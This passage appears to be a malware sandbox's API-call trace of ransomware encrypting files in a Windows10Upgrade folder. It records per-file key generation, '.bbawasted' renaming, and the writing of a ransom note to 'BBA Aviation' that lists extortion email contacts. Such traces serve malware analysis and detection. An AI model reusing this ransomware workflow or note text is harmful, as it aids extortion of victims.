KEY:\r\n[begin_key]bNLfETw++ZJ0X5qFPR1P5fQSJNWUc2TdvMpef4x/Lpcp99OITXcbky2dwxxFp346\r\n6We//t34XRHQZ7Bdg2GBbGaK/EtPNrzKIgmkcPyQL8kmZnhVV8FK+qb9QP6FfBLt\r\nMgXHZJCWZwi8q9HBA6ZAR7S3NUcXMgvAnJ8wbyVrmrwPJ70mGj8VMEZnro5WI8p/\r\nPCfGxNMDEetJbqAGMmr29uqjDmghbKLWJUCFIw8Y5s0qBjwcP2ibUk/ulTXxj+qa\r\n8S1rKhgkz+Eph/1wdLrY1RpEwenGBO866Ra128JMmLTvp6p1H0aJCYclCgE48EvU\r\ncgNMSL2g1Wv2g7xy1xr9fFDoPA9fetEcObBtSmJt4IKJEOthgm8aen7OOCfX/RVt\r\nz4KaknA1JwKK2cjeVBg5zYYuIz29HdyTx+mcrOiTY2bMYV6UV0Cw9/1qhggNnhaZ\r\nFvgxe3CdaSyrKyrxjbwwKZLpKakEX6SXBlQrPYSdh5JhF+KPge+LCpK8+/hDKKSW\r\nYKfo9mlSrijUZuM/GkjGsiozyAymIR/StJeDo+6l1fh2tbRlUUz1B3sMsKrMr7Sg\r\nD5Jl3vUlqvGI1QE2QWza8mN4UAOQ5kJr1IzxrxxrMgwOV7pdR0N8JzqH6Hvuu21b\r\njVGqbxq86j1EP4nH1x3fr/sEexF2+XnaOQk2gayXfl6=[end_key]\r\nKEEP IT\r\n") returned 984 [0239.063] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0239.063] WriteFile (in: hFile=0x294, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0239.063] SetEndOfFile (hFile=0x294) returned 1 [0239.066] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0239.066] CloseHandle (hObject=0x294) returned 1 [0239.066] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a1cd0 | out: hHeap=0x660000) returned 1 [0239.067] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b2cb0 | out: hHeap=0x660000) returned 1 [0239.067] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a68a0) returned 1 [0239.068] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0239.068] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0239.068] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\logo.png") returned 45 [0239.068] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x264) returned 0x6ad900 [0239.068] lstrcpyW (in: lpString1=0x6ad95a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0239.068] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0239.068] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6570) returned 1 [0239.069] CryptGenRandom (in: hProv=0x6a6570, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0239.069] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0239.070] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\logo.png.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\logo.png.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0239.071] WriteFile (in: hFile=0x294, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0239.073] SetEndOfFile (hFile=0x294) returned 1 [0239.073] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0239.073] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0239.073] lstrcpyW (in: lpString1=0x6ad95a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0239.073] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\logo.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\logo.png"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\logo.png.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\logo.png.bbawasted")) returned 1 [0239.075] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\logo.png.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\logo.png.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0239.075] CreateFileMappingW (hFile=0x28c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0239.075] GetFileSize (in: hFile=0x28c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xa33 [0239.076] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa33) returned 0x5f0000 [0239.076] CloseHandle (hObject=0x28c) returned 1 [0239.128] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0239.128] CloseHandle (hObject=0x290) returned 1 [0239.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6aa9f0 [0239.129] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6680) returned 1 [0239.129] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x1b8, pbBuffer=0x6aaa38 | out: pbBuffer=0x6aaa38) returned 1 [0239.129] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0239.129] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a5e88) returned 1 [0239.130] CryptGenRandom (in: hProv=0x6a5e88, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0239.130] CryptReleaseContext (hProv=0x6a5e88, dwFlags=0x0) returned 1 [0239.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0239.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa9f0 | out: hHeap=0x660000) returned 1 [0239.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0239.141] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]ez28RpDStPxHgq9oLtSgRb1cTBXf57BjnEkKXXzx/+Kg+mckihC9IIzVwcPi91Ln\r\noqnyZZrLw5bpBEtUKW8ni6fHfe4Fgv9IMbE9YbmNhDeiX4PHKzh9aGI8v1HacbHA\r\nUqryyoFh8VyacvH5c9aBg7k+sXpTXeZHXO/TNB1Yzdq6MQMSPHYBMNLns7HEBLs0\r\nr4XAV51Ig+B78TxVTACb8LzEbKg4n0iWd/uZUPnBf5zUE33HJFaGsX83Hq0FjHtm\r\nOdA0E3biCmhUA3oYxoCJ/QFageosUXIbwjsWGGfi2ocgn7b5Zfua+gnUYEDZDGr9\r\nVhPkVsRl/zdwDaMwgXsSsG44ibja78jVUr25b/41EWXsmZ78VaoWfK4XYKHuZ64z\r\nZmbUaLQ5ncgm/+lbWbDYOp7NQ6yVe29WSf4CsCLcBw1E3AYmQ9Nb6EhUOfr76DOc\r\noFCHVCh0UGxe8djTlAiCKbRQtQ14AdHcsQromQ4UkdLfJVtDzqoUU3uAVngYfz8K\r\nIQp5/8jyLcrhmAqfIngi/Uqd8uXRIBJyHJAPINp72sJmjtjUTimc8K4aKHLV+wXe\r\nmE+YBA7xzwlnsrYit0B7MCXmEcvxtp6u/qyZiUGGY2YV8+GYcZfVzqMxriUID7tf\r\nKep7rtMlimJAD0OlksC63C5ZWkUK1FjWMSGX1yDCVoD=[end_key]\r\nKEEP IT\r\n") returned 984 [0239.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0239.141] WriteFile (in: hFile=0x294, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0239.142] SetEndOfFile (hFile=0x294) returned 1 [0239.162] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0239.162] CloseHandle (hObject=0x294) returned 1 [0239.162] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0239.163] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bcd10 | out: hHeap=0x660000) returned 1 [0239.163] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6b48) returned 1 [0239.163] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0239.163] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0239.163] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\oobe-desktop.css") returned 73 [0239.163] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x29c) returned 0x6c4b88 [0239.164] lstrcpyW (in: lpString1=0x6c4c1a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0239.164] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0239.164] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a5e88) returned 1 [0239.164] CryptGenRandom (in: hProv=0x6a5e88, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0239.164] CryptReleaseContext (hProv=0x6a5e88, dwFlags=0x0) returned 1 [0239.164] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\oobe-desktop.css.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\css\\oobe-desktop.css.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0239.166] WriteFile (in: hFile=0x294, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0239.167] SetEndOfFile (hFile=0x294) returned 1 [0239.167] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0239.167] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0239.167] lstrcpyW (in: lpString1=0x6c4c1a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0239.167] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\oobe-desktop.css" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\css\\oobe-desktop.css"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\oobe-desktop.css.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\css\\oobe-desktop.css.bbawasted")) returned 1 [0239.168] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\oobe-desktop.css.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\css\\oobe-desktop.css.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0239.169] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0239.169] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x9ff9 [0239.169] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9ff9) returned 0x5f0000 [0239.169] CloseHandle (hObject=0x290) returned 1 [0239.171] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0239.172] CloseHandle (hObject=0x280) returned 1 [0239.172] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6aa1d0 [0239.172] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6c58) returned 1 [0239.173] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x1b8, pbBuffer=0x6aa218 | out: pbBuffer=0x6aa218) returned 1 [0239.173] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0239.173] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6818) returned 1 [0239.174] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0239.174] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0239.200] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6ad900 [0239.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa1d0 | out: hHeap=0x660000) returned 1 [0239.200] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0239.200] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Mc6pY8hwoYqNaV7Qkgqfxy+uKwWO2ivEPP1lc/xEqhmmQKcvtwEFIREbEedDAttV\r\nXE8Xaw283Tq0Vy8AXf33TW+KzrhKqERxHO5aPk1D/GbGYSJz5lleR32mUvenNbDJ\r\nAPgDQu7YTGgkWXAWl0G1w4pLRnPyC4EGI8PVt4esq8GCKAaCicLdpwuRXZdu1LIo\r\ncvFxNTmx54vDssMxr3tMw1BiUKaKljUiCQb04Ktz/l6fHhh+UxqgB5QnIqY9AuYC\r\nniQOkBNcSbxnxhCAihidfND6rtP8xs+FBLppD4JueT1i88k8fR2g2fJ12rrSfKLN\r\ncpDkHAZRh9l25kjCpx1Pk78uA6AWBw0MVkpOiqkuHkBcBPivJpPjE8PoUq2uOmr/\r\nE02pFLDRTpfMv7cIUzlU0zyTmJ0Kj4FrxYTmhNqkFx6cwh97e7/XBSGe1nc7vfwZ\r\nEnhviruS6t7i54vWENNiG49phpMhbGnJeqHKXRch7XZD6SeajhtUnGivB6iaOh2w\r\nluklEokbq9kd/d6S1+AlQyxD923pea6GbBT8U1B1MbKkmQsvTu99vAiV7rzbFUZU\r\nYYK0Tk3khN7trx/4E0hnf+Zee5BPDeqEUqEXca9I6HjYpBH/I94LXTqkhtre6l2I\r\nZXsv1izZXnFaxVbbVDm+mmWF6A5S/jxsR3UBIui8NCW=[end_key]\r\nKEEP IT\r\n") returned 984 [0239.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0239.200] WriteFile (in: hFile=0x294, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0239.201] SetEndOfFile (hFile=0x294) returned 1 [0239.203] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0239.203] CloseHandle (hObject=0x294) returned 1 [0239.204] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0239.204] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bfe58 | out: hHeap=0x660000) returned 1 [0239.204] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6708) returned 1 [0239.205] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0239.205] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0239.205] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\ui-dark.css") returned 68 [0239.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x292) returned 0x6c4b88 [0239.205] lstrcpyW (in: lpString1=0x6c4c10, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0239.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0239.205] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6bd0) returned 1 [0239.206] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0239.206] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0239.206] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\ui-dark.css.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\css\\ui-dark.css.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0239.225] WriteFile (in: hFile=0x294, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0239.255] SetEndOfFile (hFile=0x294) returned 1 [0239.261] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0239.261] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0239.261] lstrcpyW (in: lpString1=0x6c4c10, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0239.261] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\ui-dark.css" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\css\\ui-dark.css"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\ui-dark.css.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\css\\ui-dark.css.bbawasted")) returned 1 [0239.263] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\ui-dark.css.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\css\\ui-dark.css.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0239.263] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0239.263] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x41b67 [0239.263] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x41b67) returned 0x1480000 [0239.263] CloseHandle (hObject=0x280) returned 1 [0240.212] UnmapViewOfFile (lpBaseAddress=0x1480000) returned 1 [0240.214] CloseHandle (hObject=0x290) returned 1 [0240.215] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6aa5e0 [0240.215] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6680) returned 1 [0240.216] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x1b8, pbBuffer=0x6aa628 | out: pbBuffer=0x6aa628) returned 1 [0240.216] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0240.216] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a5f10) returned 1 [0240.217] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0240.217] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0240.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0240.225] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa5e0 | out: hHeap=0x660000) returned 1 [0240.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0240.225] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]rbz1C6XHqeKurDVjydIL+5hxLQX21sx7NZCrk6JdfJfs/+oygkK7M2kWqVfF5oxg\r\nLmmcTXH5aBCydiBRjiddbd+6qoOX+Ed/z+JkRsuMYIrfUGCQSCdH+zqoR/08uG3w\r\njdPaPwUDbT9Ey2bkIqI88vn3XesjVX8cXEkHxUe+8lPsAFyKgF3K3nkwixrurj6I\r\n8h+0VgRANqLToC43qKqYNcHLbDgstKHxuOsoF+sPfU9LfaTrZsiFLjhmmKFl1tzJ\r\ncDds2/OqkWhlHl6nk2UIXHrZg6zjhJa0fjDSl4bQsRM/Dxmr9XGxYKRd3vJ6o8T7\r\na17G09thRtkxVBnYZ1j8iSsw2lNMfDR1m0cMH2sBsU9qhr7N7izs7BsWQH1EUkLb\r\nK1x8J+9nj611GagFYFt/uNsd4aE2z5Nq0vEH0JVpE+OsbPJJDgOjh6DSQAKaq38b\r\n0DVZjEmzse1GszTKiBgvq9y78qospLsZXgsAhR5xCIfdIzIRbbOfdiLCGBfOVggY\r\nV8TGIdf9Q/6T0AxDXhcwhjfpi7xZVG4c/oiqtVroP/0tbnWqSPX5ABUadCAeRLHY\r\nxOGlnxtfxOR3+SlgrB26jbK7eisl43BWrJTfHMLM24dw16C2h1bWR4Wb9epXXCwA\r\nw0LLCUy/1ZPeaIIXgATsTpSriWJ6kdK81KnN1P4fWrg=[end_key]\r\nKEEP IT\r\n") returned 984 [0240.225] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0240.225] WriteFile (in: hFile=0x294, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0240.226] SetEndOfFile (hFile=0x294) returned 1 [0240.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0240.228] CloseHandle (hObject=0x294) returned 1 [0240.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0240.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ba708 | out: hHeap=0x660000) returned 1 [0240.228] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6d68) returned 1 [0240.229] CryptGenRandom (in: hProv=0x6a6d68, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0240.229] CryptReleaseContext (hProv=0x6a6d68, dwFlags=0x0) returned 1 [0240.229] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\ui.js") returned 61 